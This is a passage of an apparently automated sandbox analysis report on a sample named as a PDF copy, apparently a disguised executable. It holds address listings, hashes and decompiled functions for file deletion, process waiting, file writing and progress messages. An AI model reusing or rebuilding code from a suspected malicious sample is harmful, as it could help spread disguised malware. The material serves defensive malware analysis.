                                                                                            0x00406e17
                                                                                            0x00406e17
                                                                                            0x00406e1a
                                                                                            0x00406e1d
                                                                                            0x00406e1d
                                                                                            0x00406e20
                                                                                            0x00406e23
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406e29
                                                                                            0x00406e2f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406e35
                                                                                            0x00406e35
                                                                                            0x00406e39
                                                                                            0x00406e3c
                                                                                            0x00406e3f
                                                                                            0x00406e42
                                                                                            0x00406e45
                                                                                            0x00406e46
                                                                                            0x00406e49
                                                                                            0x00406e4b
                                                                                            0x00406e51
                                                                                            0x00406e54
                                                                                            0x00406e57
                                                                                            0x00406e5a
                                                                                            0x00406e5d
                                                                                            0x00406e60
                                                                                            0x00406e63
                                                                                            0x00406e7f
                                                                                            0x00406e82
                                                                                            0x00406e85
                                                                                            0x00406e88
                                                                                            0x00406e8f
                                                                                            0x00406e93
                                                                                            0x00406e95
                                                                                            0x00406e99
                                                                                            0x00406e65
                                                                                            0x00406e65
                                                                                            0x00406e69
                                                                                            0x00406e71
                                                                                            0x00406e76
                                                                                            0x00406e78
                                                                                            0x00406e7a
                                                                                            0x00406e7a
                                                                                            0x00406e9c
                                                                                            0x00406ea3
                                                                                            0x00406ea6
                                                                                            0x00000000
                                                                                            0x00406eac
                                                                                            0x00000000
                                                                                            0x00406eac
                                                                                            0x00000000
                                                                                            0x00406eb1
                                                                                            0x00406eb1
                                                                                            0x00406eb5
                                                                                            0x00407575
                                                                                            0x00000000
                                                                                            0x00407575
                                                                                            0x00406ebb
                                                                                            0x00406ebe
                                                                                            0x00406ec1
                                                                                            0x00406ec5
                                                                                            0x00406ec8
                                                                                            0x00406ece
                                                                                            0x00406ed0
                                                                                            0x00406ed0
                                                                                            0x00406ed0
                                                                                            0x00406ed3
                                                                                            0x00406ed6
                                                                                            0x00406ed6
                                                                                            0x00406ed6
                                                                                            0x00406edc
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406ede
                                                                                            0x00406ee1
                                                                                            0x00406ee4
                                                                                            0x00406ee7
                                                                                            0x00406eea
                                                                                            0x00406eed
                                                                                            0x00406ef0
                                                                                            0x00406ef3
                                                                                            0x00406ef6
                                                                                            0x00406ef9
                                                                                            0x00406efc
                                                                                            0x00406f14
                                                                                            0x00406f17
                                                                                            0x00406f1a
                                                                                            0x00406f1d
                                                                                            0x00406f1d
                                                                                            0x00406f20
                                                                                            0x00406f24
                                                                                            0x00406f26
                                                                                            0x00406efe
                                                                                            0x00406efe
                                                                                            0x00406f06
                                                                                            0x00406f0b
                                                                                            0x00406f0d
                                                                                            0x00406f0f
                                                                                            0x00406f0f
                                                                                            0x00406f29
                                                                                            0x00406f30
                                                                                            0x00406f33
                                                                                            0x00000000
                                                                                            0x00406f35
                                                                                            0x00000000
                                                                                            0x00406f35
                                                                                            0x00406f33
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406f75
                                                                                            0x00406f75
                                                                                            0x00406f79
                                                                                            0x00407581
                                                                                            0x00000000
                                                                                            0x00407581
                                                                                            0x00406f7f
                                                                                            0x00406f82
                                                                                            0x00406f85
                                                                                            0x00406f89
                                                                                            0x00406f8c
                                                                                            0x00406f92
                                                                                            0x00406f94
                                                                                            0x00406f94
                                                                                            0x00406f94
                                                                                            0x00406f97
                                                                                            0x00406f9a
                                                                                            0x00406f9a
                                                                                            0x00406fa0
                                                                                            0x00406f3e
                                                                                            0x00406f3e
                                                                                            0x00406f41
                                                                                            0x00000000
                                                                                            0x00406f41
                                                                                            0x00406fa2
                                                                                            0x00406fa2
                                                                                            0x00406fa5
                                                                                            0x00406fa8
                                                                                            0x00406fab
                                                                                            0x00406fae
                                                                                            0x00406fb1
                                                                                            0x00406fb4
                                                                                            0x00406fb7
                                                                                            0x00406fba
                                                                                            0x00406fbd
                                                                                            0x00406fc0
                                                                                            0x00406fd8
                                                                                            0x00406fdb
                                                                                            0x00406fde
                                                                                            0x00406fe1
                                                                                            0x00406fe1
                                                                                            0x00406fe4
                                                                                            0x00406fe8
                                                                                            0x00406fea
                                                                                            0x00406fc2
                                                                                            0x00406fc2
                                                                                            0x00406fca
                                                                                            0x00406fcf
                                                                                            0x00406fd1
                                                                                            0x00406fd3
                                                                                            0x00406fd3
                                                                                            0x00406fed
                                                                                            0x00406ff4
                                                                                            0x00406ff7
                                                                                            0x00000000
                                                                                            0x00406ff9
                                                                                            0x00000000
                                                                                            0x00406ff9
                                                                                            0x00000000
                                                                                            0x00407286
                                                                                            0x00407286
                                                                                            0x0040728a
                                                                                            0x004075b1
                                                                                            0x00000000
                                                                                            0x004075b1
                                                                                            0x00407290
                                                                                            0x00407293
                                                                                            0x00407296
                                                                                            0x0040729a
                                                                                            0x0040729d
                                                                                            0x004072a3
                                                                                            0x004072a5
                                                                                            0x004072a5
                                                                                            0x004072a5
                                                                                            0x004072a8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407056
                                                                                            0x00407056
                                                                                            0x00407059
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x00000000
                                                                                            0x004073cb
                                                                                            0x00000000
                                                                                            0x00407395
                                                                                            0x00407399
                                                                                            0x004073bb
                                                                                            0x004073be
                                                                                            0x004073c8
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x00000000
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x0040739b
                                                                                            0x0040739e
                                                                                            0x004073a2
                                                                                            0x004073a5
                                                                                            0x004073a5
                                                                                            0x004073a8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407452
                                                                                            0x00407456
                                                                                            0x00407474
                                                                                            0x00407474
                                                                                            0x00407474
                                                                                            0x0040747b
                                                                                            0x00407482
                                                                                            0x00407489
                                                                                            0x00407489
                                                                                            0x00000000
                                                                                            0x00407489
                                                                                            0x00407458
                                                                                            0x0040745b
                                                                                            0x0040745e
                                                                                            0x00407461
                                                                                            0x00407468
                                                                                            0x004073ac
                                                                                            0x004073ac
                                                                                            0x004073af
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407543
                                                                                            0x00407546
                                                                                            0x00407447
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040717d
                                                                                            0x0040717f
                                                                                            0x00407186
                                                                                            0x00407187
                                                                                            0x00407189
                                                                                            0x0040718c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407194
                                                                                            0x00407197
                                                                                            0x0040719a
                                                                                            0x0040719c
                                                                                            0x0040719e
                                                                                            0x0040719e
                                                                                            0x0040719f
                                                                                            0x004071a2
                                                                                            0x004071a9
                                                                                            0x004071ac
                                                                                            0x004071ba
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407490
                                                                                            0x00407490
                                                                                            0x00407493
                                                                                            0x0040749a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040749f
                                                                                            0x0040749f
                                                                                            0x004074a3
                                                                                            0x004075db
                                                                                            0x00000000
                                                                                            0x004075db
                                                                                            0x004074a9
                                                                                            0x004074ac
                                                                                            0x004074af
                                                                                            0x004074b3
                                                                                            0x004074b6
                                                                                            0x004074bc
                                                                                            0x004074be
                                                                                            0x004074be
                                                                                            0x004074be
                                                                                            0x004074c1
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c7
                                                                                            0x004074c7
                                                                                            0x004074cb
                                                                                            0x0040752b
                                                                                            0x0040752e
                                                                                            0x00407533
                                                                                            0x00407534
                                                                                            0x00407536
                                                                                            0x00407538
                                                                                            0x0040753b
                                                                                            0x00407447
                                                                                            0x00407447
                                                                                            0x00000000
                                                                                            0x0040744d
                                                                                            0x00407447
                                                                                            0x004074cd
                                                                                            0x004074d3
                                                                                            0x004074d6
                                                                                            0x004074d9
                                                                                            0x004074dc
                                                                                            0x004074df
                                                                                            0x004074e2
                                                                                            0x004074e5
                                                                                            0x004074e8
                                                                                            0x004074eb
                                                                                            0x004074ee
                                                                                            0x00407507
                                                                                            0x0040750a
                                                                                            0x0040750d
                                                                                            0x00407510
                                                                                            0x00407514
                                                                                            0x00407516
                                                                                            0x00407516
                                                                                            0x00407517
                                                                                            0x0040751a
                                                                                            0x004074f0
                                                                                            0x004074f0
                                                                                            0x004074f8
                                                                                            0x004074fd
                                                                                            0x004074ff
                                                                                            0x00407502
                                                                                            0x00407502
                                                                                            0x0040751d
                                                                                            0x00407524
                                                                                            0x00000000
                                                                                            0x00407526
                                                                                            0x00000000
                                                                                            0x00407526
                                                                                            0x00000000
                                                                                            0x004071c2
                                                                                            0x004071c5
                                                                                            0x004071fb
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732e
                                                                                            0x0040732e
                                                                                            0x00407331
                                                                                            0x00407333
                                                                                            0x004075bd
                                                                                            0x00000000
                                                                                            0x004075bd
                                                                                            0x00407339
                                                                                            0x0040733c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407342
                                                                                            0x00407346
                                                                                            0x00407349
                                                                                            0x00407349
                                                                                            0x00407349
                                                                                            0x00000000
                                                                                            0x00407349
                                                                                            0x004071c7
                                                                                            0x004071c9
                                                                                            0x004071cb
                                                                                            0x004071cd
                                                                                            0x004071d0
                                                                                            0x004071d1
                                                                                            0x004071d3
                                                                                            0x004071d5
                                                                                            0x004071d8
                                                                                            0x004071db
                                                                                            0x004071f1
                                                                                            0x004071f6
                                                                                            0x0040722e
                                                                                            0x0040722e
                                                                                            0x00407232
                                                                                            0x0040725e
                                                                                            0x00407260
                                                                                            0x00407267
                                                                                            0x0040726a
                                                                                            0x0040726d
                                                                                            0x0040726d
                                                                                            0x00407272
                                                                                            0x00407272
                                                                                            0x00407274
                                                                                            0x00407277
                                                                                            0x0040727e
                                                                                            0x00407281
                                                                                            0x004072ae
                                                                                            0x004072ae
                                                                                            0x004072b1
                                                                                            0x004072b4
                                                                                            0x00407328
                                                                                            0x00407328
                                                                                            0x00407328
                                                                                            0x00000000
                                                                                            0x00407328
                                                                                            0x004072b6
                                                                                            0x004072bc
                                                                                            0x004072bf
                                                                                            0x004072c2
                                                                                            0x004072c5
                                                                                            0x004072c8
                                                                                            0x004072cb
                                                                                            0x004072ce
                                                                                            0x004072d1
                                                                                            0x004072d4
                                                                                            0x004072d7
                                                                                            0x004072f0
                                                                                            0x004072f2
                                                                                            0x004072f5
                                                                                            0x004072f6
                                                                                            0x004072f9
                                                                                            0x004072fb
                                                                                            0x004072fe
                                                                                            0x00407300
                                                                                            0x00407302
                                                                                            0x00407305
                                                                                            0x00407307
                                                                                            0x0040730a
                                                                                            0x0040730e
                                                                                            0x00407310
                                                                                            0x00407310
                                                                                            0x00407311
                                                                                            0x00407314
                                                                                            0x00407317
                                                                                            0x004072d9
                                                                                            0x004072d9
                                                                                            0x004072e1
                                                                                            0x004072e6
                                                                                            0x004072e8
                                                                                            0x004072eb
                                                                                            0x004072eb
                                                                                            0x0040731a
                                                                                            0x00407321
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x00000000
                                                                                            0x00407323
                                                                                            0x00000000
                                                                                            0x00407323
                                                                                            0x00407321
                                                                                            0x00407234
                                                                                            0x00407237
                                                                                            0x00407239
                                                                                            0x0040723c
                                                                                            0x0040723f
                                                                                            0x00407242
                                                                                            0x00407244
                                                                                            0x00407247
                                                                                            0x0040724a
                                                                                            0x0040724a
                                                                                            0x0040724d
                                                                                            0x0040724d
                                                                                            0x00407250
                                                                                            0x00407257
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x00000000
                                                                                            0x00407259
                                                                                            0x00000000
                                                                                            0x00407259
                                                                                            0x00407257
                                                                                            0x004071dd
                                                                                            0x004071e0
                                                                                            0x004071e2
                                                                                            0x004071e5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406f44
                                                                                            0x00406f44
                                                                                            0x00406f48
                                                                                            0x0040758d
                                                                                            0x00000000
                                                                                            0x0040758d
                                                                                            0x00406f4e
                                                                                            0x00406f51
                                                                                            0x00406f54
                                                                                            0x00406f57
                                                                                            0x00406f5a
                                                                                            0x00406f5d
                                                                                            0x00406f60
                                                                                            0x00406f62
                                                                                            0x00406f65
                                                                                            0x00406f68
                                                                                            0x00406f6b
                                                                                            0x00406f6d
                                                                                            0x00406f6d
                                                                                            0x00406f6d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004070cf
                                                                                            0x004070cf
                                                                                            0x004070d3
                                                                                            0x00407599
                                                                                            0x00000000
                                                                                            0x00407599
                                                                                            0x004070d9
                                                                                            0x004070dc
                                                                                            0x004070df
                                                                                            0x004070e2
                                                                                            0x004070e4
                                                                                            0x004070e4
                                                                                            0x004070e4
                                                                                            0x004070e7
                                                                                            0x004070ea
                                                                                            0x004070ed
                                                                                            0x004070f0
                                                                                            0x004070f3
                                                                                            0x004070f6
                                                                                            0x004070f7
                                                                                            0x004070f9
                                                                                            0x004070f9
                                                                                            0x004070f9
                                                                                            0x004070fc
                                                                                            0x004070ff
                                                                                            0x00407102
                                                                                            0x00407105
                                                                                            0x00407105
                                                                                            0x00407105
                                                                                            0x00407108
                                                                                            0x0040710a
                                                                                            0x0040710a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040734c
                                                                                            0x0040734c
                                                                                            0x0040734c
                                                                                            0x00407350
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407356
                                                                                            0x00407359
                                                                                            0x0040735c
                                                                                            0x0040735f
                                                                                            0x00407361
                                                                                            0x00407361
                                                                                            0x00407361
                                                                                            0x00407364
                                                                                            0x00407367
                                                                                            0x0040736a
                                                                                            0x0040736d
                                                                                            0x00407370
                                                                                            0x00407373
                                                                                            0x00407374
                                                                                            0x00407376
                                                                                            0x00407376
                                                                                            0x00407376
                                                                                            0x00407379
                                                                                            0x0040737c
                                                                                            0x0040737f
                                                                                            0x00407382
                                                                                            0x00407385
                                                                                            0x00407389
                                                                                            0x0040738b
                                                                                            0x0040738e
                                                                                            0x00000000
                                                                                            0x00407390
                                                                                            0x0040710d
                                                                                            0x0040710d
                                                                                            0x00000000
                                                                                            0x0040710d
                                                                                            0x0040738e
                                                                                            0x004075c3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406bf2
                                                                                            0x004075fa
                                                                                            0x004075fa
                                                                                            0x00000000
                                                                                            0x004075fa
                                                                                            0x00407447
                                                                                            0x004073ce
                                                                                            0x004073cb

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                            • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                                                            • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                            • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405D2C Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 41%
                                                                                            			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406133(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                                                                                            0x00405d2d
                                                                                            0x00405d38
                                                                                            0x00405d3d
                                                                                            0x00405d6d
                                                                                            0x00000000
                                                                                            0x00405d6d
                                                                                            0x00405d44
                                                                                            0x00405d45
                                                                                            0x00405d4f
                                                                                            0x00405d47
                                                                                            0x00405d47
                                                                                            0x00405d47
                                                                                            0x00405d57
                                                                                            0x00405d63
                                                                                            0x00405d67
                                                                                            0x00405d67
                                                                                            0x00000000
                                                                                            0x00405d59
                                                                                            0x00000000
                                                                                            0x00405d5b

                                                                                            APIs
                                                                                              • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                              • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                                                            • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                            • String ID:
                                                                                            • API String ID: 1655745494-0
                                                                                            • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                                                            • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                                                                            • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                                                            • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00406AE0 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00406AE0(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A71(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                                                                                            0x00406af1
                                                                                            0x00406b08
                                                                                            0x00406afc
                                                                                            0x00406b06
                                                                                            0x00406b06
                                                                                            0x00406b13
                                                                                            0x00406b1f

                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                                                                            • GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: ObjectSingleWait$CodeExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 2567322000-0
                                                                                            • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                                                            • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                                                                            • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                                                            • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040620A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                            0x0040620e
                                                                                            0x0040621e
                                                                                            0x00406226
                                                                                            0x00000000
                                                                                            0x0040622d
                                                                                            0x00000000
                                                                                            0x0040622f

                                                                                            APIs
                                                                                            • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040D1FC,defghijklmnopqrstuvwxyz,00403579,defghijklmnopqrstuvwxyz,0040D1FC,eNotification,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                                                            Strings
                                                                                            • defghijklmnopqrstuvwxyz, xrefs: 0040620A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID: defghijklmnopqrstuvwxyz
                                                                                            • API String ID: 3934441357-638117201
                                                                                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                            • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                                                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                            • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 69%
                                                                                            			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}











                                                                                            0x0040138a
                                                                                            0x004013fa
                                                                                            0x0040139b
                                                                                            0x004013a0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004013a2
                                                                                            0x004013a3
                                                                                            0x004013ad
                                                                                            0x00000000
                                                                                            0x00401404
                                                                                            0x004013b0
                                                                                            0x004013b7
                                                                                            0x004013bd
                                                                                            0x004013be
                                                                                            0x004013c0
                                                                                            0x004013c2
                                                                                            0x004013b9
                                                                                            0x004013b9
                                                                                            0x004013ba
                                                                                            0x004013ba
                                                                                            0x004013c9
                                                                                            0x004013cb
                                                                                            0x004013f4
                                                                                            0x004013f4
                                                                                            0x004013c9
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                            • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                                                            • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                            • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
